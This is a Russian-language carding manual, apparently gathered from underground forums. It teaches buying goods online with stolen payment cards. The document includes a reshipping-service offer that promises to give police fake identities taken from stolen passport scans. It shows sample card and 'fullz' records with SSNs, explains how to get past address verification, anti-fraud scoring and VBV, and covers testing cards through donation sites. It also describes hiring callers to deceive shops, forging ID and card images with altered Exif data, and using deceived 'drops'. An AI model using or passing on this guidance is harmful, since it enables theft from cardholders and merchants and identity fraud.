Мы получаем все посылки и СРАЗУ ЖЕ (в течении нескольких часов) высылаем их по указанному вами адресу.
Мы консолидируем посылки и отправляем их одной коробкой ТОЛЬКО в случае если все ваши доставки пришли в 1 день или ПОД ВАШУ ОТВЕТСТВЕННОСТЬ (мы можем хранить посылки сколько угодно и высылать их все вместе, но в таком случае если хотя бы одна посылка будет отозвана, полиция изымет все посылки на данного получателя).
Если ваши доставки идут друг за другом в разные дни, это будут РАЗНЫЕ отправления (если не обговорено иное).
Мы НЕ несем ответственности за отозванные посылки ДО нашей отправки по любой причине!
После контакта полиции с нами, на счет вашей посылки, мы будем выдавать им левые ФИО, адрес и иную информацию о Вас, заранеё подготовленную из имеющийся у меня базы сканов паспортов и т.д.
В таком варианте вы можете слать свои посылки напрямую себе домой, никто кроме человека отправляющего посылку - знать ваши данные не будет.

Цены за наши услуги:
Мы берем 10% от стоимости посылки, минимум 100$.
Плюс стоимость пересылки.
Вы можете подсчитывать стоимость калькулятором на сайте https://shopfans.ru, выбирая Priority Mail Express.

Итак короткий алгоритм, что нужно для работы с нами:
Написать для получения адреса.
Отправить посылку на наш адрес, в соответствии с выданными мной инструкциями.
Когда вы видите что ваша посылка выслана и вы получили трекинг номер - оплатить мне стомость услуг и стоимость пересылки, сообщить данные куда данную посылку отправлять.
Если ваша посылка получена нами, а оплата не пришла - она будет отправлена ОБРАТНО В ШОП.
В случае если оплата произведена, но посылка возвращена в полицию - деньги за наши услуги и за пересылку будут возвращены, либо зачтены в будущую пересылку - по выбору (при условии ОТСУТСТВИЯ ХРАНЕНИЯ ПО ВАШЕМУ ЖЕЛАНИЮ и ПОД ВАШУ ОТВЕТСТВЕННОСТЬ).
Я готов работать через гаранта нашего борда, за Ваш счет.
Принимаем только БИТКОИН и в редких случаях ВМР, ещё реже КИВИ.

P.S. Так же продолжаем работать по Гифт картам:
1) Покупка стафа за вашу гифт карту в физическом магазине - 10% от номинала гифки (минимум 50$).
Главное требование, магазины которые принимают ваши гифты должны быть в районе 33100-33200 ZIP кода. Это 99% всех больших сетевиков. Если ваш магазин мелкий - проверяйте его адрес заранеё.
2) Продажа Вашего стафа, купленного нами за Вашу гифт карту - 10% от суммы продажи (минимум 50$).
Недавний случай из практики - посылка получена через посредника. Cтоимоcть посылки 3000 $
Посылка была отправлена с аккаунта посредника на дропа. Трек отслеживался проблем не было, посылка пересекла границу, прошла таможню и прибыла в место вручения. Дроп пришел забирать а ему вручили письмо, а посылку отправили назад в Америку.
Так что если посылка отправлена и пересекла границу это еще не значит что она будет получена вами!
Удачной всем доставки!


Разбор вбива

Будем исходить из того, что систему вы уже настроили, интересующий вас товар уже выбрали, и шоп с таким товаром нашли. Что вам следует делать Далее:
1. Зайти в шоп с какой-нибудь внешней ссылки, например из гугла.
2. Очень желательно побродить по магазину минут 10, всячески изображая из себя настоящего покупателя: разглядывая разные товары, перемещаясь по сайту и т.д.
3. Добавить наконец интересующий нас товар в корзину. Обычно это кнопки "Buy" или "Add to bag"
4. После нажатия на корзину мы можем просмотреть её содержимое, сумму, убрать или изменить количество товаров
5. Чтобы закончить покупку нажимаем на кнопку Checkout. Тут-то и начинается самое интересное. Обо всём этом Далее.
6. Вводим все данные, жмём Continue Checkout. Подтверждаем, что ввели всё верно и завершаем покупку. Наблюдаем либо зелёную надпись, что заказ принят в работу, либо красную с описанием (или без) проблемы.
7. Если вошло, то ждите обновлений статуса заказа на почте. Во многих шопах можно проверить статус заказа в личном кабинете. Не забывайте одевать носок того же штата, если хотите так сделать.

Данные для вбива.
Будем разбирать всё по порядку. Предположим, что вы делаете прямой вбив американским картоном, и собираетесь слать товар на обычную контору-посредника в США. Также у вас есть дроп для получения посылок на родине, допустим его зовут Саша Роттенберг. Теперь нужно зарегистрировать почтовый ящик на имя вашего дропа, допустим [email protected]. Регистрируетесь на посреднике с ру айпи, указываете данные и мыло дропа. На сайте посредника получаете адрес примерно такого вида:
Имя: Alexander
Фамилия: Rottenberg
Street address (строка 1): 500 Carpenters Crossing
Street address (строка 2): BWW Ste 256113
Город: Folcroft
Штат: "Pennsylvania" или "PA"
Индекс: 19012-0511
Телефон: (734)5199594
Отлично, адрес есть. Теперь покупаете картон, он будет примерно в таком виде (обычно выглядит гораздо лучше):
372396944501016 0914 9500 TAMI BEVERIDGE 952 NORMANDY DRIVE NEW KENSINGTON PA 15068 United States

Разбор карты.
Теперь вам остается только зарегистрировать самому или купить оптом почтовых ящиков для вбива (купить можно здесь: buyaccs.com). Купленные будут такого вида:
[email protected]:ti38ioNg:Beatrix:Banks:f:11:1:1982:3:utyulume:05494Готово! У нас есть всё, что нужно.
1. Billing information1. email — [email protected]
2. First Name — Beatrix (имя берём любое, оно никогда не проверяется при процессинге карты)
3. Last Name — Banks
4. Address — 925 Normandy Drive (С карты, адрес должен совпадать. Пишем не капсом, а красиво)
5. City — New Kensington
6. Country — US & Territories
7. State — Pennsylvania
8. Postal Code — 15086
9. Billing phone number — 7342656724 Указываем либо из вечнозанятых, либо факс какого-нибудь предприятия в этом городе (варианты похуже), либо номер скайпа под штат (скайп легко вбивается амексом по $10 за транзакцию, аренда номера стоит $18).
10. Shipping information1. Check if same as billing information — мы бы выбрали этот пункт при вбиве гифта, энролле, либо чтобы сделать весёлый сюрприз кардхолдеру.
First Name — Alexander (все данные с посредника)
Last Name — Rottenberg
Address 1 — 500 Carpenters Crossing
Address 2 — BWW Ste 256113
City — Folcroft
Country — US & Territories
State — Pennsylvania
Postal Code — 19012-0511 (обязательно укажите индекс от посредника полностью, иначе ваш пак не найдут).
Shipping phone number — 7345199549 Можно указать номер посредника с двумя неправильными цифрами: чтоб ему не докучали звонками из шопа, и чтоб сам посредник не обиделся, что мы не указывали его номер).
Shipping — доставка. Чем дороже, тем быстреё. А чем быстреё, тем меньше шансов, что посылку завернут из-за чарджа. С другой стороны, оплата супербыстрой доставки ради лишнего дня тоже может вызвать подозрения.
Payment information. Payment method — нужно указать, какой компании у нас картон. Определяем по первой цифре номера: 3 — American Express, 4 — Visa, 5 — MasterCard
Card number — 372396944501016
Expiration date — sep 2022
Security Code — 9500

В тех пунктах, где допускаются вариации, болеё надёжное решение даёт болеё высокие шансы на удачный вбив. Например, принять прозвон от магазина в скайпе гораздо лучше, чем если менеджер услышит только короткие гудки, пытаясь уточнить заказ. И не забывайте, что правдоподобный холдер может свернуть горы, изменить русла рек, и даже шипнуть с apple.com. Удачных вбивов!


Общий вид идеальной безопасности

Общий вид идеальной безопасности состоит из: внешнего жесткого диска (или флешки), на котором в зашифрованном контейнере хранится виртуальная машина. С этой виртуальной машины вы выходите в сеть, используя VPN для безопасности, и носок (или туннель) для маскировки.

Подробнеё:
1. Внешний жесткий диск (на который устанавливается виртуальная машина с ОС Windows и всеми нужными программами) который будет зашифрован с помощью TrueCrypt.
2. TrueCrypt — компьютерная программа для шифрования «на лету» для 32- и 64-разрядных операционных систем семейств Microsoft Windows, Linux и Mac OS. Она позволяет создавать виртуальный зашифрованный логический диск, хранящийся в виде файла. С помощью TrueCrypt также можно полностью шифровать раздел жёсткого диска или иного носителя информации, такой как флоппи-диск или USB флеш-память. Все сохранённые данные в томе TrueCrypt полностью шифруются, включая имена файлов и каталогов.
3. Виртуальная Машина: VirtualBox или VMware. Обе этих программы отлично подходят для наших нужд (кому какая удобнеё). С помощью этих программ необходимо установить Windows XP (ENG) или Win7 (ENG) на внешний жесткий диск.
Виртуальная машина исполняет некоторый машинно-независимый код или машинный код реального процессора. Помимо процессора, ВМ может эмулировать работу как отдельных компонентов аппаратного обеспечения, так и целого реального компьютера (включая BIOS, оперативную память, жёсткий диск и другие периферийные устройства). В последнем случае в ВМ, как и на реальный компьютер, можно устанавливать операционные системы (например, Windows можно запускать в виртуальной машине под Linux или наоборот). На одном компьютере может функционировать несколько виртуальных машин.
4. Операционная система (обычно Windows XP ENG или Win7 ENG), которую мы устанавливаем на
виртуальную машину.
5. VPN (англ. Virtual Private Network — виртуальная частная сеть) — технология, позволяющая обеспечить одно или несколько сетевых соединений (логическую сеть) поверх другой сети (например, Интернет).
VPN Double (Двойной) — связка VPN серверов, при которой подключение происходит в одной стране, после чего трафик по зашифрованному каналу передается на другой сервер и оттуда выходит в мир.ˆ
Защита от любого рода слежения и перехвата информации.
ˆ Защита от хакерских атак в локальной сети.
ˆ Firewall, препятствующий сканированию вашего IP адреса из сети интернет злоумышленниками.
ˆ Доступ в интернет без ограничений, которые существуют на локальном или государственном уровне.
ˆ Посещение сайтов (онлайн гемблинг и т.д.) если доступ с вашей страны запрещен.
ˆ Защита от сканирования и перехвата трафика в WI-FI сетях.
ˆ Полный доступ ко всем VOIP операторам, в том числе Skype.
ˆ Полностью анонимный доступ в интернет
ˆ SOCKS (носки) — сетевой протокол, который позволяет клиент-серверным приложениям прозрачно использовать сервисы за межсетевыми экранами (фаерволами).
При вбиве нужно всегда поверх одевать носки! Здесь вопрос не только в маскировке под холдера, но и в скрытии самого VPN, в дата центр которого, теоретически могут заявиться для изъятия данных.
ˆ SSH- туннель — это туннель, создаваемый посредством SSH соединения и используемый для шифрования туннелированных данных. Используется для того, чтобы обезопасить передачу данных в интернете. Особенность состоит в том, что незашифрованный траффик какого-либо протокола шифруется на одном конце SSH соединения и расшифровывается на другом. Используется как альтернатива Socksам.
Основные преимущетва перед Socksами:ˆ Стоят дешевле — порядка $15 в месяц
ˆ Болеё живучи — почти никогда не слетают на самом важном месте CHECKOUT!


Credit card (cc)

Пример CC:
4270204034949890|1214|731|Tim Stone|United States|Florida|Napels|33212|182 S Terra St|
(305)512-1115|[email protected]4270204034949890 — номер кредитной карты (16 цифр)
1214 — дата истечения срока действия карты (expiration date)
731 — защитный код (CVV2)
Tim Stone — имя и фамилия владельца карты
United States — страна проживания владельца карты
Florida — штат проживания владельца карты
Napels — город проживания владельца карты
33212 — почтовый индекс (Zip code, Postal code) владельца карты
182 S Terra St — улица и дом владельца карты
(305) 512-1115 — номер телефона владельца карты (бывает не всегда)
[email protected] — почта владельца карты (бывает не всегда)

Для определения типа вашей карты (VISA, MC, AMEX, MAESTRO), необходимо знать:
Если номер карты начинается:
ˆ на 3 - American Express
ˆ на 4 - VISA
ˆ на 5 - MasterCard
ˆ на 6 - Maestro
Также необходимо помнить:
У MasterCard и у VISA номер карты состоит из 16 цифр, у American Express из 15.
Защитный код (CVV2) у MASTERCARD и у VISA состоит из трёх цифр, у American Express из четырех.
Не во всех CC штат может быть написан полностью, очень часто он обозначен двумя буквами, примеры: IA, AR, DE и т.д. - чтобы узнать штат, пользуйтесь таблицей http://iec.kiev.ua/us-states.shtml.
Если в CC адрес написан криво или отсутствует, пользуйтесь гуглом и ищите его по ZIP коду.
Баланс на обычной CC никогда не известен, однако зная её уровень (Gold, Platinum и т.д.), можно его предполагать.

Full СС (фулка) — полная информация о кредитной карте, включая информацию о владельце карты, а именно SSN, DOB, MMN.
SSN — Social Security number (номер социального страхования картхолдера)
DOB — date of birth (дата рождения картхолдера)
MMN — mother's maiden name (девичья фамилия матери картхолдера, бывает не всегда)
Пример Фулки:
Код:Jessica Bows 4727388374652983 0816 931 16353 Collins Ave FL 33180 United States 786-534-5342
DOB 10.09.1980
SSN 5546-256-3545Также ещё может присутствовать инфа, что и на обычной CC, типа почты, телефона и т.д.

Для чего нужна эта инфа и для чего нужны Фулки:
Они нужны для того, что бы сделать Энролл — создать онлайн аккаунт в банке.
Ролят карты как правило для того, чтобы узнать баланс карты и сменить её биллинг адрес.
Для чего это нужно:
ˆ Узнать баланс карты
ˆ Сменить её биллинг адрес. Это нужно потому, что мало какие магазины шлют на отличный от биллинга, шиппинг адрес. В таком случае мы можем поменять биллинг адрес, на шиппинг адрес дропа.
Таким образом к примеру: мы имеем сша шоп и сша сс, а так же дропа в сша, мы делаем ролку меняем биллинг адрес картхолдера на адрес дропа после чего заказываем товар на биллинг адрес и всё ок. Но на деле конечно же не всё так просто. Биллинг адрес сменить не так уж и легко, при этом вам как минимум придется принять прозвон и иметь инфу MMN. И это как минимум.

Дополнительные защиты кредитных карт:
VBV (Verified by Visa) — суть системы в том, что при оплате товаров или услуг в интернете необходимо ввести дополнительный проверочный код, который владелец карты получает от банка, выпустившего карту.
У MasterCard есть аналогичная защита — SECURITY CODE.
У American Express ничего подобного нет!

Дополнительная информация о кредитной карте:
Банк Эмитент — банк выдавший карту и контролирующий её.
Бин — первые шесть цифр номера карты, по которым можно определить:
Банк эмитент, уровень карты, тип карты и другую инфу!

Как это проверить:
1. Заходим на сайт www.bindb.com (аналогов много, пользуйтесь гуглом)
2. Нажимаем Bin Search (вверху)
3. Вводим Бин и капчу, после ввода нажимаем Search
Должна появиться информация такого плана:
Bin: 421766
Card Brand: VISA
Issuing Bank: BANK OF AMERICA NATIONAL ASSOCIATION
Card Type: DEBIT
Card Level: PLATINUM
Iso Country Name: UNITED STATES
Iso Country A2: US
Iso Country A3: USA
Iso Country Number: 840Так же можно пользоваться массовым BIN чекером - можно сразу загрузить много данных http://ug4all.com/binchecker/.


Чекеры, Донаты

Чекеры и донаты — это, по сути, одно и то же, так как первые работают используя вторые.
Для начала разберем что такое донат. Само по себе слово донат от английского donate переводится как жертвовать. Пользуясь донатом мы делаем добровольное маленькое пожертвование какой либо организации с купленной нами СС. И по факту прохождения или не прохождения транзы понимаем валид карта или нет. Мерчи в донатах как правило неприхотливые и на вашу геолокацию и биллинг адрес им наплевать. Чтобы вбить карту в донат зачастую требуется лишь номер карты, exp и код cvv.
Теперь разберем что такое чекер.
Чекеры есть как в самих шопах СС, так и в виде отдельных сайтов или программ.
Работают они по принципу отправления деппов в те же донаты, другими словами работа с чекером — это полуавтоматизированный процесс работы с донатом.
Тут стоит разделить их на два типа: "убивающие" и "не убивающие" картон.
Поясню почему некоторые картон убивают. Когда через определенный донат проходят тысячи транз, после которых были совершены мошеннические действия с тех же карт, он попадает в черные списки банков, и после транзы в такой донат банк карту автоматом лочит (блокирует). Стоит заметить, что сделает это не каждый банк, а только тот, в чёрном списке которого находится этот донат, так что зависит это еще и от банка эмитента карты.
И если тот чекер в котором вы чекаете СС отправил депп именно в такой донат то карту он вам убьёт.
Например шоповские чекеры убивают картон напропалую и вероятность того что вы через 5 минут после чека эту карту никуда уже не вобьете очень велика.
Платные чекеры в виде отдельных сайтов картон убивают значительно реже, по причине того, что работают с несколькими или одним, но болеё чистым донатом.


Настройка системы для вбива

Для того, чтобы хорошо маскироваться под гражданина США, работать нужно грамотно. Без выполнения следующих пунктов шансы на успех вашего вбива стремительно приближаются к нулю.
Первоначальная настройка:
1. Виртуальная машина — для эмуляции "железа" компьтера. Позволяют легко создавать/копировать/удалять системы прямо на вашем ПК. В этих целях можно использовать и отдельный ноутбук/ПК, но ни в коем случае не стоит вбивать с вашей основной ОС.
2. Английская ОС Windows (xp/win7) — подойдёт любая, например: torrentino.com. А вот здесь можно выбрать на любой вкус и цвет: nnm-club.me.
3. Английская языковая раскладка (другие нежелательны)
4. Сервера DNS — очень часто палят ваше реальное местоположение в обход всех ваших стараний скрыть его. Настройка DNS
5. Браузер с английской локализацией — например, отличный вариант:ˆ SRWare Iron

Перед каждым вбивом:
1. IP под адрес доставки (англ. shipping address) — при помощи ваших SOCKS5, SSH-туннелей или дедиков. Обычно, чем ближе айпи к адресу, который вы указываете при вбиве, тем менеё подозрительным считается заказ.
2. Время под штат — можно гуглить "current time in %город%", носок которого используете. Или просто свериться со списком: Штаты и часовые пояса. Удобнеё всего вбивать в рабочеё время в штате, под который маскируетесь: чтобы ваш заказ обработали как можно быстреё, не вбивайте в вечер пятницы и в выходные. Лучше с утра в будни.
3. Чистые куки браузера (проверить можно по адресу check2ip.com), а почистить при помощи: CCleaner


АВС, сверка имени/адреса, запрос дополнительных данных

Сверка адресов
Сверкой адресов занимается система под названием АВС.
Эта система сверяет только billing адрес указаный при вбиве с реальным адресом картхолдера.
Так что работая например с USA материалом указать вместо адреса холдера адрес вашего посредника не выйдет, такая транза сразу лочится (блокируется) и лочится сама карта.
Но и у этой системы как и у любой другой есть свои дыры.
Есть определенный ряд стран адреса которых может проверить система АВС (США), подчеркиваю, речь сейчас идет о системе АВС именно США.
Вот список этих стран: США; Мексика; Австралия; Бразилия; Новая зеландия; Англия; Канада.
А адрес холдера, к примеру, Италии она пробить не может, вот тут то и стоит играться в тех случаях когда работаем с EU материалом и вписываем биллинг посредника (читайте про работу с EU материалом).
А материал США в шопах США подходит лишь для гифтов, так как покупая гифт мы пишем реальный billing адрес.

Антифрауд
Антифрод система - группа фильтров, настроенных в зависимости от предпочтения владельцев онлайн шопов и платежных систем, предназначенная для своевременного выявления и предотвращения мошеннических интернет транзакций.
Задачей антифрода является высчитывание процентной вероятности мошеннической операции именуемой FraudScore (FS) на основе главных факторов риска (основных), а так же дополнительных (вторичных), постоянно дополняемых и усовершенствованных факторов.
К примеру, если FS показатель выше заданного значения X то срабатывает "Alert" - оповещение о блокировке операции или переводе в ручной режим в зависимости от настроек (запрос сканов, документов, прозвоны, ID транзакций и прочая ерунда..)
Антифрауд-мониторинг среднестатистического магазина отслеживает и присваивает значение риска транзакции (Risk Score) по 45 переменным. Максимальное значение = 100, минимальное — 0.
Количество ордеров же в крупных магазинах доходит до нескольких тысяч в минуту. Глупо судить о ручной проверке такого объема информации, — все полностью автоматизировано.
Основные факторы риска:
1. IP диапазон - проверка географического местоположения покупателя, не соответствие IP холдера (держателя пластиковой карты) и онлайн магазина с IP покупателя.
2. Электронная почта - заюзанная прежде, используемая у бесплатных провайдерах, не соответствующая стране холдера.
3. Анонимные прокси - если IP покупателя в черном списке.
4. Страны с высоким риском фрода: Россия, Украина, Молдова, Беларусь, Филипины, Гонконг, Египет,
Индонезия, Ливан, Македония - тут стоит отметить что список таких стран каждый банк составляет
отдельно исходя из собственного опыта, опыта других банков, а так же рекомендаций мировых
платежных систем.
5. Расстояние между IP покупателя и адресом доставки
6. Проверка по бину банка - не соответствие страны IP и страны банка выпустившего карту
7. Проверка IP на публичность (open proxy).
8. Проверка IP в спам листах.
9. Частота транзакций. Нельзя бить одну карту как последнюю в ваших руках! Стоит вбить 3 раза за 10 минут и уже автоматом сработает тревога. Вбили 1 раз оплату, выдержали паузу поработав с другим материалом, только потом допустимо использовать повторно. При этом помните, что не раз говорил в идеале 1цц=1вбив, особенно когда щипаете дорогой стаф.
Спиок рискскоре почты:
1. @corp_domain.com - 0.*
2. aol.com 0.*-1
3. gmail ~ 1
4. msn.com - 1.2
5. yahoo.com - 1.4
6. hotmail.com - 1.5
7. qq.com - 1.9
8. mail.ru - 2.5
9. rambler.ru - 2.6
10. yandex.ru - 3.5
11. bk.ru - 5.6
12. yandex.com - 6.6
13. gmx.com - 7.4
14. outlook.com - 9.1
15. mail.com - 9-10
16. hushmail.com - 15.2
17. pinterest.com - 15.3
18. nokiamail.com (yahoo) - 15.9
19. qip.ru - 18.8
20. дочки mail.com:ˆ artlover.com - 12.5
ˆ europe.com - 14
ˆ null.net - 14
ˆ optician.com - 17
ˆ marchmail.com – 18
ˆ activist.com - 19


Данные, которые может запросить шоп

Прозвон и данные для него
Шоп может попросить вас позвонить для проверки или уточнения некоторых данных.
Желательно подготовить все эти данные до прозвона чтобы иметь возможность быстро отвечать.
Если пользуетесь услугами прозвонщика, то ему желательно сообщить максимально много данных.
Данные, необходимы для прозвона:
1. ФИО холдера
2. Мейл холдера
3. Данные сс (номер, эксп достаточно)
4. Билинг
5. Шипинг
6. ССН + ДОБ !!!(ПОСЧИТАЙТЕ И УКАЖИТЕ СКОЛЬКО ХОЛДЕРУ ЛЕТ) - бывает, что спрашивают.
7. Сайт куда вбивал
8. Номер ордера
9. число и варемя ордера
10. Название товара !!!(КРАТКОЕ ОПИСАНИЕ ТОВАРА: ЧТО ЭТО в двух словах)
11. Сумма вбива
12. Номер куда звонить
13. Номер с которого звонить
14. Название банка (на всякий, иногда спрашивают)
15. Телефон службы поддержки банка (иногда просят продиктовать телефон, который написан сзади на сс)
16. Письмо с конторы, куда звоним (если есть)
17. Причина звонка
18. Цель звонка
Дополнительные данные держателя карты.
Допнительно для того чтобы удостовериться, что вы на самом деле владелец карты могут запросить следующие документы:
ˆ ID (это как паспорт)
ˆ Паспорт
ˆ Водительские права
ˆ Выписку по кредитной карте из банковского аккаунта
ˆ Фото карты, которой расплачивались (с одной или с двух сторон)
Всё это могут попросить вкупе+фото вас самих с картой и паспортом в руках.
Это всё отрисовывается у отрисовщиков, но имеёт смысл делать это в тех случаях, когда стафф дорогой.


Введение в терминологию

Карж (кардинг, крадинг) — процесс получения товаров/услуг/материальных благ путём несанкционированного использования банковских карт третьих лиц.

В данной методичке описана работа с онлайн-стороной этой деятельности. Оффлайн-сторона будет упомянута только в этой части мануала, для расширения кругозора.

Картон (картошка, картонка, карта, СС, ЦЦ, англ. credit card) — все реквизиты карты, необходимые для оплаты через интернет: номер, защитный код, дата окончания обслуживания, ФИ картхолдера, адрес. Могут быть и дополнительные данные: email, DOB, MMN, SSN.
Картхолдер (кардхолдер, англ. cardholder — держатель карты) — настоящий владелец карты.

MMN (ММН, англ. mother's maiden name) — девичья фамилия матери.
DOB (ДОБ, англ. date of birth) — дата рождения.
SSN (ССН, англ. social secure number) — индивидуальный номер налогоплательшика.
DL (ДЛ, англ. driver's license) — номер водительских прав.

Пробив — процесс нахождения информации в базах данных. В кардинге обычно подразумевается нахождение SSN, DOB, MMN, DL.
Пробивщик — человек, который ищет данные на заказ за вознаграждение.

Вбив (бить, вбить) — ввод данных картона в шоп.
Щип (щипнуть) — скардить что-либо.
Шип (шипнуть) — прислать скарженное.

Шоп (англ. shop) — онлайн-магазин. Так называют как магазины, в которые вбивают картон, так и магазины, в которых картон покупают.
Стафф (англ. stuff — вещи) — товар.
Корзина (по-английски bin) — виртуальная "корзина" с товаром, который вы собираетесь купить в магазине.
Чекаут (англ. checkout) — процесс оплаты товара.
Пак (англ. pack — упаковка) — товар, который упакован, или уже в пути.
Мерч (мерчант, англ. merchant — купец, продавец) — платежная система. Юридическое лицо, принимающеё платежи по пластиковым картам.
Ордер (англ. order) — заказ.
Инвойс (англ. invoice) — счет.
Трэк (трек, англ. tracking number — номер отслеживания) — номер, который выдаёт магазин или почтовая служба для слежения за посылкой онлайн.
Прозвон — звонок с целью введения в заблуждение сотрудников магазина, почты или другого предприятия. Обычно служит для подтверждения заказа или решения проблем при помощи психологического давления.
Прозвонщик — человек, который за деньги предоставляет услуги по прозвону. Обычно имеёт хорошо поставленный английский и навыки убеждения.

Дроп — человек, который выполняет за вас определённую работу, обычно грязную. Чаще всего подразумевается функция приёма и отправки карженых посылок за материальное вознаграждение.
Разводной дроп — не знает, что занимается незаконной деятельностью. Позволил ввести себя в заблуждение ради неплохих денег за плёвую работу.
Неразводной дроп — добровольно идёт на риск ради материальной выгоды.
Дроповод — человек, который профессионально занимается набором дропов, их психологической обработкой и продажей их услуг.

Реал-карж (реальный кардинг) — кардинг "в живую".
Шоппинг (англ. shopping) — покупки в реальных магазинах на чужие карты.

POS (ПОС, POS-терминал, англ. point-of-sale — точка продажи) — терминал, устанавливаемый в магазинах для считывания карты.
Белый пластик — готовые к записи на них данных болванки кредитных карт. Обычно из белого пластика, отсюда и название.
Пластик — дубликат чужой карты.
Пин — четырехзначное число, служащеё паролем для доступа к карте через банкомат, а иногда и через сайт банка.


VBV/MCSC

VBV - Verified by Visa
MCSC - MasterCard SecureCode
Примечание:Не путать с CVV карты.

Пояснение с сайта visa.com/ru:
Что такое Verified by Visa («Проверено Visa»)?
Сервис Verified by Visa («Проверено Visa») обеспечивает дополнительную безопасность при покупке товаров через интернет. Эту бесплатную услугу легко активировать для карты, которая у вас уже есть.

Как это работает?
С помощью банка, выпустившего вашу карту, определите персональный метод идентификации и в течение нескольких минут активируйте карту. Банк предложит вам либо выбрать пароль, либо пришлёт код по SMS на ваш мобильный телефон. После активации услуга Verified by Visa («Проверено Visa») обеспечит вам необходимую защиту при каждом посещении интернет-магазина.
При покупках в интернет-магазине система автоматически определит, что ваша карта защищена Verified by Visa («Проверено Visa»).
Проверьте подробности транзакции. Подтвердите, что инструкция соответствует условиям договора с вашим банком-эмитентом.
Следуйте инструкции, чтобы завершить транзакцию.
Банк-эмитент подтвердит ваши данные, после чего транзакция будет успешно выполнена.

MCSC - пояснение с сайта Mastercard.ru:
MasterCard SecureCode — это простой и безопасный способ оплаты покупок в интернет-магазинах.
Секретный код SecureCode, известный только Вам и банку обслуживания, обеспечивает Вашу пластиковую карту MasterCard дополнительной защитой от несанкционированного использования в интернет-магазинах, поддерживающих данную технологию.
Проще говоря VBV и MCSC это как пин-код но только для покупок в интернете.
Сейчас на подавляющем большинстве карт установлена VBV и MCSC защита,но так же до сих пор есть карты на которых этой защиты нет. Найти эти карты карты можно по БИНам которые так и называются "no vbv".
Разобрав то в каком виде мы покупаем карту в шопе сс и обнаружив что VBV или MCSC там нигде нет, напрашивается резонный вопрос "как же нам совершить покупку на чужую карту не зная этого кода?". Тут все просто,во время покупки в интернет магазине(Далее шоп) вбв код у нас запрашивает не банк выпустивший карту а мерчант который отвечает за транзакцию между банком держателя карты и шопом. Мерчант по БИНу карты определяет присутствует ли ВБВ защита у карты и в случае присутствия либо перекидывает на сайт банка где нас просят ввести код либо же это делается в окне самого мерчанта. Здесь самое прекрасное то что мерчантов запрашивающих этот код по США не болеё 10-15%, всем остальным для проведения транзакции вполне достаточно тех данных о карте которые мы имеем при покупке в шопе сс.
В те мерчанты что требуют ВБВ следует бить либо СС+ВБВ (материал редкий и дорогой) либо СС с БИНами no vbv.
В случае вбива СС+ВБВ в шоп не придет чарджбек так как всю ответственность за такую транзакцию несёт банк холдера, в этом случае вероятность безпроблемного получения товара от шопа стремится к 100%.Проблемы при таком вбиве будут только у холдера или банка, как они между собой будут решать этот вопрос неизвестно и не интересно, самое главное наш стафф получен,продан и карман жжёт кардерская копейка.
В случае вбива СС+ВБВ можно без проблем слать на разные билл шипп адреса,так как доверие мерчантов и шопов к таким транзакциям очень велико.


Запрос дополнительной верификации

Вне зависимости от того, каким материалом вы работаете, что покупаете, и на какую сумму, в любом шопе у вас могут потребовать дополнительную верификацию. Такой верификацией является звонок от вас в шоп или сканы документов.

1. ПРОЗВОН
Если на скайп или email указанный при вбиве пришло сообщение о том, что вам нужно связаться с шопом, будьте уверены что пак по вашему ордеру не вышлют если вы этого не сделаете.
Если с разговорным английским у вас проблемы не переживайте.
Бороться с этим не сложно так как давно на рынке кардинга есть предложения по любым прозвонам куда угодно. Прозвонщик позвонит в шоп с того номера с которого вы скажете и скажет то, что вы укажете в задании по прозвону. Контакты прозвонщиков вы найдете в "полезных контактах".

Информацию для прозвонщика следует составлять следующим образом:
ХОЛДЕР: Имя холдера
КАРТА: Номер карты|exp|cvv
БАНК ВЫПУСТИВШИЙ КАРТУ: Узнать можно пробив бин карты в бинчекере.
ТЕЛЕФОН БАНКА: Здесь указывайте тел. банка, найти его несложно на сайте самого банка, так же по
возможности укажите телефон для связи с сервисом обслуживания владельцев именно того типа карты, с которой был вбив (так же все пробивается зайдя в раздел "контакты" на сайте банка, не забывайте так же про страну в которой была выпущена карта).
ШОП: url шопа
ОРДЕР: Номер ордера
ДАТА: Дата ордера
ЗАКАЗ: Все что заказывали с указанием цен.
БИЛЛИНГ АДРЕС:
ШИППИНГ АДРЕС:
ТЕЛЕФОН С КОТОРОГО ЗВОНИТЬ:
ТЕЛЕФОН ПО КОТОРОМУ ЗВОНИТЬ:
ЦЕЛЬ ЗВОНКА:
ПРИЧИНА ЗВОНКА: Указывайте причину, ваша инициатива или запрос шопа.
ДОП. ДАННЫЕ: Здесь пишите задание и нюансы при вбиве.

ПОМНИТЕ: Старайтесь как можно больше дать информации прозвонщику: он должен знать о вбиве всё, что знаете вы. От этого зависит успех прозвона.

2. ОТРИСОВКА

Дополнительной проверкой может стать просьба шопа о том, чтобы вы прислали им сканы документов и карты, с которой была произведена покупка.
Такие нюансы проверки как правило всплывают во время прозвона в шоп.
Не стоит отчаиваться и ставить крест на ордере, так как на рынке кардинга так же, как и по прозвонам, есть масса предложений по отрисовке практически любых документов и любых СС.
Контакты отрисовщиков вы найдете в "полезных контактах".
В зависимости от того какие документы у вас попросили в шопе составляете заказ отрисовщику.
Могут попросить: СС, Паспорт, ID(как паспорт), фото с СС в руках.
Если не скажут, что с нескольких сторон нужны сканы то рисуем только с одной стороны (в целях экономии).
Отрисовка выглядит как правило не как скан а как фото.

Когда отрисовка готова и вы собрались отправить фотографии на указанный шопом email, не торопитесь!
Не стоит обходить вниманием такой параметр как Exif.
Exif — это все данные о снимке: на какое устройство сделано, дата, время и т.д.
Особенно важным для нас параметром является дата и время снимка.
О том как изменить Exif данные вы можете прочитать Здесь
Так же не помешает дать название файлу в виде даты и времени, очень много устройств делают так по умолчанию.


Биллинг/шиппинг

Заходим в шоп косметики и выбираем товар, кладем в корзину.
Затем нажимаем на корзину и выбираем CHECKOUT.
Далее нам предлагают выбрать варианты доставки и заполнить Shipping и Billing Address.
Заполняем Shipping Address (адрес доставки):
First Name: Имя
Last Name: Фамилия
Phone: телефон (пишем на выбор или тел скайпа заранеё подготовленный под штат и город, или телефон отеля или школы рядом с улицы холдера (находим по https://www.google.ru/map.)
Address: Адрес. Если адрес у холдера записан в две сточки то тут его тоже пишем в 2 строчки. Как правило это длинные адреса с номером апартаментов или комнаты.
Zip Code: Почтовый индекс
City: Город
State: Штат
Country: Страна

Заполняем Billing Address (адрес регистрации картхолдера):
First Name: Имя
Last Name: Фамилия
Phone: Телефон (пишем на выбор или тел скайпа заранеё подготовленный под штат и город, или телефон отеля или школы рядом с улицы холдера, находим по https://www.google.ru/map
